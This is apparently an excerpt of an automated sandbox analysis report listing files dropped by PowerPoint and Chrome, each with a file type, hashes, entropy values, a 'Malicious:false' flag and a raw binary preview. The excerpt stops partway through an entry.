                                                                                                                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3075
                                                                                                                              Entropy (8bit):7.716021191059687
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5151
                                                                                                                              Entropy (8bit):7.859615916913808
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12
                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:/l:
                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                              Malicious:false
                                                                                                                              Preview:............
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12
                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:/l:
                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                              Malicious:false
                                                                                                                              Preview:............
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12
                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:/l:
                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                              Malicious:false
                                                                                                                              Preview:............
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):12
                                                                                                                              Entropy (8bit):0.41381685030363374
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:/l:
                                                                                                                              MD5:E4A1661C2C886EBB688DEC494532431C
                                                                                                                              SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                                                                                                                              SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                                                                                                                              SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                                                                                                                              Malicious:false
                                                                                                                              Preview:............
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:10:47 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2677
                                                                                                                              Entropy (8bit):3.9798962983922577
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8+7deTD7orHAidAKZdA1JehwiZUklqehs5y+3:8+oUujy
                                                                                                                              MD5:3D5FBFD406876FC24153241AC5FDF1F1
                                                                                                                              SHA1:6F060D53D70B1E3B3AF557D445A29522719D8C1F
                                                                                                                              SHA-256:690A7AB9F28D703557B35C45CD7C7AA35A143070FA7FFF52529B1C4FEFD91746
                                                                                                                              SHA-512:C90DC87F89BD4AA67A8A88552F1E3E8DEBB9230B39B86B175FE7293385F8B4E37544ED6D70AA7ACDF4030ABFD38374A34C9D8A43C8EDE5F93A8A581E80A00B0E
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,.....&..^.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VDYXi...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:10:47 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2679
                                                                                                                              Entropy (8bit):3.9965693680759555
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8P7deTD7orHAidAKZdA10eh/iZUkAQkqehh5y+2:8PoUc9Qey
                                                                                                                              MD5:11F041028227DB428C7D7AA32E2409C6
                                                                                                                              SHA1:865079890814F0E33EAEE59A1DC4641F72EDA586
                                                                                                                              SHA-256:4D9D4E27DC18E2B974140965AA23B9E587529E6C3BEB9B6485607D83626480F2
                                                                                                                              SHA-512:9E57286E39A3E6219DCC6C4AFA2C40EC74378CC2FC918E44A890858643BA2DDFFDF6B465877A1CCB0688BA88C589843B0A4DF2BC83348E2FE444B4EF6733E104
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,....w...^.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VDYXi...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2693
                                                                                                                              Entropy (8bit):4.005720157801585
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8e7deTD7ojHAidAKZdA14tIeh7sFiZUkmgqeh7sf5y+BX:8eoUMn3y
                                                                                                                              MD5:C5B7EC2AF3404AD6ADB7C654029B49B9
                                                                                                                              SHA1:A18EC635BAA56183ACCCCA427FA6F9B8E35797CC
                                                                                                                              SHA-256:2BEB3BA6FF9CB2244061FA63639FD016CDF99ACBD841F1A764B1C9D0202959E2
                                                                                                                              SHA-512:E18D38E2EC78D251FDB54109993EE0EE563E0DF62047B77CC03F6E9F7C6F5D5BC081B55BBE56382E3EE3A8469E98B4C84DC9D90AA6C2CE8688C9B0392F26760A
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:10:47 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.9968907836433507
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8V7deTD7orHAidAKZdA1behDiZUkwqehl5y+R:8VoUX5y
                                                                                                                              MD5:C5F5D0FB3878C2D342EAFB3B4605C99A
                                                                                                                              SHA1:BD57C517E3B287047D659E1E62ECF7F7BD87BDDC
                                                                                                                              SHA-256:97CC393B16EE5FF08471FE81900AFB362AD07F38B6B4E714C3197E3FE08F8EB7
                                                                                                                              SHA-512:93A396A20B8E145A98641B9456FDBFEB53B1CFB840FECEABE2DD11CC85CD06EF970A99412901092B73D88713BE8CAB858A0665300C032D3CCCF5E7FF73DDB145
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,....|{..^.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VDYXi...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:10:47 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.9835390088573153
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8D7deTD7orHAidAKZdA1VehBiZUk1W1qehb5y+C:8DoUn9ly
                                                                                                                              MD5:B7AE540FD6FE113DC44CE709821F29B0
                                                                                                                              SHA1:C39CAADAB2E0CC6F9F36A403AD4B0861A52431C6
                                                                                                                              SHA-256:A7B21E6F9012D15A6035D8E1D0F392CA9BCB8DE214190118DCCADA38511A5032
                                                                                                                              SHA-512:1144C756A1A8D05F8393C54CA4D74D31CF92B4394C4BE027599C0A9EF235FF4A2D710CB9529B7589DFBDB2EDD0695595607C9699048D279AE35492898A22CD33
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,........^.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VDYXi...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:10:47 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):3.99421842937096
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8Q7deTD7orHAidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbd5y+yT+:8QoUjTTTbxWOvTb3y7T
                                                                                                                              MD5:732CEBE18BF305D494D484FB7A2900EF
                                                                                                                              SHA1:F61FCC2328E61F715B5A6B2856C22B07CA8AA0CE
                                                                                                                              SHA-256:0A9217D00936EF28879179BB11A52E0403AC58643B0D2012F44EC21786E01BF3
                                                                                                                              SHA-512:E71E3CB3E24155FC9F7B99BAF7F0EE297DFB8FE0F9CA8E2BC04B7A4F21553C8E603812B977C469551FD0A70746CF7F9365418CE5860FB0C3F150A755A16AD440
                                                                                                                              Malicious:false
                                                                                                                              Preview:L..................F.@.. ...$+.,........^.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IDYEi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYWi....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VDYWi....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VDYWi...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VDYXi...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............6N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):165
                                                                                                                              Entropy (8bit):1.5036061025690532
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:4HAmFF/6ftt:4rFFS
                                                                                                                              MD5:1C05AC60B385CD6F420E80A460BA8A73
                                                                                                                              SHA1:F58D59C0B7CCB76CA0A78FF1B5442922C351045A
                                                                                                                              SHA-256:DFE61C6D039791E10FBB1379D3ADA0AECF7E280297EF4E3D8C3AAF754F303C5A
                                                                                                                              SHA-512:CA71873F95B4A27AF9E609EB47755A4292802957FDD1C2EE08234FE7797AFD051C6D9E804C9F0BD23E2211AEBBBADBEA6CA41BB86722BF85D74851AB077531FE
                                                                                                                              Malicious:false
                                                                                                                              Preview:.user. ..t.o.r.r.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):116365
                                                                                                                              Entropy (8bit):7.997737813291819
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1536:9IyZY3F6VvgB9lnrhw1h+WbhcNtrpUzwXkqGeKTgcao2AYvXMpclkcKAXWG8NYh:9BZ5hu91Nwz+trpGmkReMgcaQYXlkcjR
                                                                                                                              MD5:2D3FBED6DDD719FCC1BFB500B612FCEC
                                                                                                                              SHA1:CD91B795DDE806AC8A38E51CCB6E8BAD8E57DA1B
                                                                                                                              SHA-256:B2566B646F02DF4CE30B05D8223B78130A719D4EC9E4794A0106C371ADE33CC7
                                                                                                                              SHA-512:A870E514B325D6FDC4D154438A8DD333C7AB46E545C1B27AC4869D9F1D8594CA1CDC530F5E96C835220DDAD4E1CEF841673696978031B5237E783972AEE701D1
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........k[.H.(.}..[..-..c.0DFxHBz.I......O.a...#yt......k...J..&...........^.~...._..j...W;.8<.....]....m...~.}<.8~s.~=.(....qm.Oy.~....jaP......h.F^......|oZ.G.M-...,...a..~..GW|...L....N.(y...Z-..Cm......p.......?.5/.QmS..b^K...jw..8.}..Q.....!.o..8...&X.x-.Im.F.D..U;.....-.T.:...1........8Ka..M.L.ZZ'....>........x....v.S;.<...0J.I.0.G.....B.F..c.k.~....C.:...r..,.w.q~....q......#42V.q..f|.kK...1o.mP.}.......N..n.w6.%^M.d.;...~2I.Z..fs...S/......F..=?...5....s..N.+.A.mx...j.T......?..W._p6.|.}|.{O.....2..`..._......g....j..xb^^...a.y.....s......4....q.Y..^T....X,.....m..~v,.....WP.U...:O".YoRX...7..S...zI.v.......mq.....E.,z.%....L|.>.M.'i..ki3.u+.~...x.=...?6.%?.[.G.`Z=.$.w..4.."...R.1.k.|..N.`......3...7.].'.E..).az......<a....4q..6.(..=~..........frk..?M#^Q.z..A..M.f.......S....s..d.e91._,zO.[X.......4.G..!.9Vg.......j.-?~.z.w..f.M............,...Z....w5..#.^..M.P.'.X.n/..mW.|......0...w../...>\...l.......h...q>.w...FC[....7.
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 141866
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):49804
                                                                                                                              Entropy (8bit):7.994672288751266
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:1536:SMuttwJ0uUmAcZjNL6nnQlL+mwKLiQC7Mn3dxPErr:SwJ0vmAcKnnQF+8LJOMn3DPE/
                                                                                                                              MD5:6DE768A4DF1E0D0061CDB52EF06346C4
                                                                                                                              SHA1:3829A667B97668008023DDA98F4C0772174C8EF6
                                                                                                                              SHA-256:58732EEE2ED9091F4F5776DC8A8A14116CBE5A2BA1CCDA0256896BAB08A52128
                                                                                                                              SHA-512:CC6966D2C2B43E762750102E734DA6B88D7BFB92DDB5D482EE25029337D95E997466E83001586F2B63DAEE890B5F3188E8EC0F1B084D5EB67CFEA55EDDFAD47D
                                                                                                                              Malicious:false
                                                                                                                              Preview:...........m[.8.0........OL....;w..nf.0.ff.X.'V......4.r~........=........,..JU.......T~.l..?..E.....X..|t~P9...TN..G..?^.~.............Xx.0..Q..Fa4.#7.q...F.;......4...Q.W&~.@....O.*T.y.37J.+Ggf...P....Pz.N...>..a.D..<.m./A,*...Q.....WN.Q...8.Db$.G.H<...'....J,..8..{nG.2@HYkL../......=.pL....A?.&Ng.i,......2lo...$.<.3...?~pW..=...L..&x.QR.u3..#6q2....U.Y1..".M. .<W."7@......w..."H,@......0..P....p:...[...E].A..%..V.K\.......F.ir.}.Lc{s..O.g..(|.........9o..A.t.K....Wv.l6..T.......t.........+..........-w {l..g...V..\=W.j.oaT}t.J`E..$W......;.k.\.t.w~}".....jf..W..."..a..0y........@.T.1.G0.......*.Y_....../..........@.....*]+.*..*.q\.cR.....t.3S-5g....'U.j.d......y.n,:).|.?.FW...d...|.......*.`.3....kMKf...#..,DM.TY+..g.........e+.>...{y..N/..g-#FV.V.p.......Xs.(..{..}..-.O..H=."...........8M.g..!H..0.~.Tdf.;...$D%N .)..!..V...'r\.... ...&....J|."Nd%D:uw:.<W.+...H&.Z...L=..U.v....J.t.0%+...U..3M....y...L..G...p='.....pB"-..|.....j .a".i=O.R Q2..."...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 449703
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):122193
                                                                                                                              Entropy (8bit):7.997505273485286
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:3072:H4ojbjOwCNA0H+Zenw+OA6m3SmjcnlDHG21TIoN:dHyi0Ity3wnY2lIA
                                                                                                                              MD5:AF2A7A4929E13F15A045C8C8D80A4543
                                                                                                                              SHA1:6A1EC81A5085D0846C77DD616AE686FF732C32D6
